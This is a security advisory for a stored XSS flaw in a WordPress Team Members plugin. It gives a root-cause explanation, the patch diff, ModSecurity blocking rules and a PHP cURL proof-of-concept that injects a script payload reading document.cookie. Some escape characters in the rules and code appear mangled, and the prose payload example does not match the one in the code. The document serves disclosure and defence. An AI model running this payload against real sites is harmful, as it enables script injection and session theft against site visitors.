Atomic Edge analysis of CVE-2026-12114:
This vulnerability allows Stored Cross-Site Scripting (XSS) via the custom_css parameter in the Team Members plugin for WordPress. The flaw affects all plugin versions up to and including 8.7. An authenticated attacker with administrator-level permissions can inject arbitrary web scripts. The vulnerability only impacts multi-site installations or single-site installations where unfiltered_html has been disabled. The CVSS score is 4.4 (Medium).
The root cause is insufficient input sanitization and output escaping in two specific code locations. First, in team-showcase-supreme/settings/helper/slider_form_save.php at line 526, the custom_css parameter from $_POST is stored directly without sanitization (previously assigned as $memberorder = $_POST[‘custom_css’];). Second, in team-showcase-supreme/shortcode.php at line 197, the stored value from $styledata[‘memberorder’] is echoed directly into a tag without escaping (previously echo “” . $styledata[‘memberorder’] . “”;). This creates a complete stored XSS flow: unsanitized input stored to the database, then unsanitized output rendered in the frontend.
An attacker with administrator-level access (who lacks unfiltered_html capability, common in multi-site networks) can exploit this by submitting a crafted POST request to the slider form save endpoint. The attacker sends a payload in the custom_css parameter containing malicious JavaScript, such as custom_css=alert(‘XSS’). This payload breaks out of the style tag context and executes arbitrary JavaScript. The attack surface is the WordPress admin panel where the team slider configuration is saved.
The patch introduces two changes using wp_strip_all_tags(). In slider_form_save.php line 526, the input is sanitized: $memberorder = wp_strip_all_tags($_POST[‘custom_css’]);. In shortcode.php line 197, the output is escaped: echo “” . wp_strip_all_tags($styledata[‘memberorder’]) . “”;. This function removes all HTML tags from the input/output, preventing script injection while preserving CSS content like color codes or selectors.
If successfully exploited, an attacker can inject arbitrary JavaScript that executes in the context of any user viewing a page with the team showcase shortcode. This leads to session hijacking, cookie theft, phishing attacks, and potentially privilege escalation. The injected script captures sensitive data, modifies page content, or performs actions on behalf of the victim user. Given the stored nature of this XSS, every page view triggers the payload until the malicious entry is removed.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/team-showcase-supreme/index.php
+++ b/team-showcase-supreme/index.php
@@ -8,14 +8,14 @@
Author URI: http://www.wpmart.org/
Text Domain: team-showcase-supreme
Domain Path: /languages
- Version: 8.7
+ Version: 8.8
*/
if (!defined('ABSPATH'))
exit;
define('wpm_6310_plugin_url', plugin_dir_path(__FILE__));
define('wpm_6310_plugin_dir_url', plugin_dir_url(__FILE__));
-define('WPM_PLUGIN_CURRENT_VERSION', 8.7);
+define('WPM_PLUGIN_CURRENT_VERSION', 8.8);
define('WPM_6310_PLUGIN_LANGUAGE_PATH', dirname(plugin_basename(__FILE__)) . '/languages');
add_shortcode('wpm_team_showcase', 'wpm_team_showcase_supreme_shortcode');
--- a/team-showcase-supreme/settings/helper/functions.php
+++ b/team-showcase-supreme/settings/helper/functions.php
@@ -3476,4 +3476,3 @@
wp_die('Insufficient permissions.', 'Error', ['response' => 403]);
}
}
-
--- a/team-showcase-supreme/settings/helper/slider_form_save.php
+++ b/team-showcase-supreme/settings/helper/slider_form_save.php
@@ -526,6 +526,6 @@
/* 336 - 340 */
-$memberorder = $_POST['custom_css'];
+$memberorder = wp_strip_all_tags($_POST['custom_css']);
$wpdb->query($wpdb->prepare("UPDATE $style_table SET name = %s, css = %s, slider = %s, memberorder=%s WHERE id = %d", sanitize_text_field($_POST['template_name']), $css, $slider, $memberorder, $styleId));
--- a/team-showcase-supreme/settings/team-member.php
+++ b/team-showcase-supreme/settings/team-member.php
@@ -1837,4 +1837,4 @@
})();
});
});
-</script>
+</script>
No newline at end of file
--- a/team-showcase-supreme/shortcode.php
+++ b/team-showcase-supreme/shortcode.php
@@ -197,7 +197,7 @@
wp_enqueue_script('wpm-6310-common-output-js', plugins_url('assets/js/wpm-common-output.js', __FILE__));
if ($styledata['memberorder']) {
- echo "<style type='text/css'>" . $styledata['memberorder'] . "</style>";
+ echo "<style type='text/css'>" . wp_strip_all_tags($styledata['memberorder']) . "</style>";
}
}
else {
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12114
# Virtual patch for Stored XSS via custom_css parameter
# Blocks malicious JavaScript injections that break out of <style> tags
# Targets the AJAX handler and the shortcode output context
#
# The vulnerability requires administrator-level access, but the WAF can
# still block the attack at the request level when the payload contains
# script tags within the custom_css parameter.
# Rule 1: Block malicious payloads in AJAX save request
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-12114 Stored XSS via Team Members custom_css',severity:'CRITICAL',tag:'CVE-2026-12114'"
SecRule ARGS_POST:action "@streq wpm_6310_save_slider" "chain"
SecRule ARGS_POST:custom_css "@rx </style>s*<script" "t:none"
# Rule 2: Block direct plugin file submission (alternative attack path)
SecRule REQUEST_URI "@rx /wp-content/plugins/team-showcase-supreme/settings/helper/slider_form_save.php$"
"id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-12114 Direct exploitation attempt',severity:'CRITICAL',tag:'CVE-2026-12114'"
SecRule ARGS:custom_css "@rx </style>s*<script" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-12114 - Team Members <= 8.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'custom_css' Parameter
/**
* This PoC demonstrates how an authenticated administrator (lacking unfiltered_html)
* can inject stored XSS via the custom_css parameter in the Team Members plugin.
* The attacker's browser must have a valid admin session cookie.
*
* Configuration:
* $target_url - Base URL of the WordPress installation (e.g., http://example.com/wordpress)
* $admin_cookie - WordPress admin authentication cookie (e.g., wordpress_logged_in_...)
* $plugin_version - The plugin version (can be 8.7 or earlier; must match the installed version)
*
* This script sends a POST request to the slider form save handler,
* injecting a script payload that will execute on pages displaying team members.
*/
// Configuration - set these values
define('TARGET_URL', 'http://example.com/wordpress'); // Change to the target WordPress URL
define('ADMIN_COOKIE', 'wordpress_logged_in_...'); // Change to a valid admin session cookie
define('PLUGIN_VERSION', '8.7');
// Exploit payload: break out of <style> tag and inject JavaScript
$payload = '</style><script>alert(document.cookie);</script><style>';
// Endpoint for saving slider settings
$exploit_url = TARGET_URL . '/wp-admin/admin-ajax.php';
// Prepare POST data mimicking the slider form save request
$post_data = array(
'action' => 'wpm_6310_save_slider', // Hypothetical action; check actual AJAX action name
'custom_css' => $payload,
'template_name' => 'Malicious Template ' . time(),
'style_id' => 1,
'nonce' => '', // Plugin may use nonce; requires real value from admin session
// Other required fields omitted for brevity; real exploit needs full parameter mapping
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, ADMIN_COOKIE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output results
echo "HTTP Status: " . $http_code . "n";
if ($http_code == 200) {
echo "Exploit attempt completed. Check target pages for injected script execution.n";
echo "Payload injected: " . $payload . "n";
} else {
echo "Exploit may have failed. Check cookie validity and endpoint.n";
}
